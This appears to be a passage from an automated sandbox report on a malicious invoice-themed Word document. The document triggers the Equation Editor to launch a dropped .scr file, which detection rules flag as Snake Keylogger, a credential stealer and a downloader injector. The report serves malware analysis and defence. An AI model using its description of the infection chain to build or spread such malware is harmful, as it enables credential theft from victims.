            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAAE9011_2_01EAAE90
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAAA4811_2_01EAAA48
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAAA4011_2_01EAAA40
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA2A2811_2_01EA2A28
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA2A3811_2_01EA2A38
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAAA3811_2_01EAAA38
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAAA3C11_2_01EAAA3C
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAEE0811_2_01EAEE08
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAEE0C11_2_01EAEE0C
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA5A0011_2_01EA5A00
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAEE0011_2_01EAEE00
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA7A1011_2_01EA7A10
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01F90CD811_2_01F90CD8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01F9069011_2_01F90690
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01F9004011_2_01F90040
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01F90CC811_2_01F90CC8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01F90CCC11_2_01F90CCC
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01F9068011_2_01F90680
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01F9003811_2_01F90038
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01F9000611_2_01F90006
            Source: ~WRF{56E3829F-B9EE-407D-9BA0-759B5D6DE9EF}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: 10.2.obi23456.scr.310000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 10.2.obi23456.scr.34b7a20.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.obi23456.scr.34b7a20.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 10.2.obi23456.scr.34b7a20.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 10.2.obi23456.scr.34b7a20.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 11.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 11.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 11.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 10.2.obi23456.scr.34971f0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.obi23456.scr.34971f0.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 10.2.obi23456.scr.34971f0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 10.2.obi23456.scr.34971f0.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 10.2.obi23456.scr.3407b70.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 10.2.obi23456.scr.310000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 10.2.obi23456.scr.2409714.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 10.2.obi23456.scr.2406ed4.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 10.2.obi23456.scr.34b7a20.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.obi23456.scr.34b7a20.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 10.2.obi23456.scr.34b7a20.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 10.2.obi23456.scr.34b7a20.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 10.2.obi23456.scr.34971f0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.obi23456.scr.34971f0.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 10.2.obi23456.scr.34971f0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 10.2.obi23456.scr.34971f0.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 10.2.obi23456.scr.3407b70.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.obi23456.scr.3407b70.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 10.2.obi23456.scr.3407b70.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 10.2.obi23456.scr.3407b70.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0000000A.00000002.414496758.0000000000310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0000000A.00000002.417577947.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000A.00000002.417577947.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: obi23456.scr PID: 3500, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: obi23456.scr PID: 3500, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: obi23456.scr PID: 3532, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: obi23456.scr PID: 3532, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56784164.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: 10.2.obi23456.scr.34b7a20.7.raw.unpack, zi--.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.obi23456.scr.34b7a20.7.raw.unpack, zi--.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.obi23456.scr.34b7a20.7.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.obi23456.scr.34b7a20.7.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.obi23456.scr.3407b70.6.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.obi23456.scr.310000.0.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.obi23456.scr.34971f0.5.raw.unpack, zi--.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.obi23456.scr.34971f0.5.raw.unpack, zi--.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.obi23456.scr.34971f0.5.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.obi23456.scr.34971f0.5.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
            Source: 10.2.obi23456.scr.3407b70.6.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: 10.2.obi23456.scr.310000.0.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@6/19@36/7
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ER DUE INVOICE PAYMENT.docx.docJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB06A.tmpJump to behavior
            Source: OVER DUE INVOICE PAYMENT.docx.docOLE indicator, Word Document stream: true
            Source: ~WRF{56E3829F-B9EE-407D-9BA0-759B5D6DE9EF}.tmp.0.drOLE document summary: title field not present or empty
            Source: ~WRF{56E3829F-B9EE-407D-9BA0-759B5D6DE9EF}.tmp.0.drOLE document summary: author field not present or empty
            Source: ~WRF{56E3829F-B9EE-407D-9BA0-759B5D6DE9EF}.tmp.0.drOLE document summary: edited time not present or 0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: OVER DUE INVOICE PAYMENT.docx.docReversingLabs: Detection: 34%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess created: C:\Users\user\AppData\Roaming\obi23456.scr "C:\Users\user\AppData\Roaming\obi23456.scr"Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: credssp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrSection loaded: gpapi.dllJump to behavior
            Source: OVER DUE INVOICE PAYMENT.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\OVER DUE INVOICE PAYMENT.docx.doc
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Roaming\obi23456.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: OVER DUE INVOICE PAYMENT.docx.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: obi23456.scr, 0000000A.00000002.417529163.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.414654030.0000000000550000.00000004.08000000.00040000.00000000.sdmp
            Source: OVER DUE INVOICE PAYMENT.docx.docInitial sample: OLE indicators vbamacros = False

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: obb[1].scr.9.dr, ----.cs.Net Code: CreateProvider
            Source: obi23456.scr.9.dr, ----.cs.Net Code: CreateProvider
            Source: obb[1].scr.9.drStatic PE information: 0x922C3AB8 [Tue Sep 17 22:29:12 2047 UTC]
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00915DDA push esi; ret 9_2_00915DDB
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_009001F4 push eax; retf 9_2_009001F5
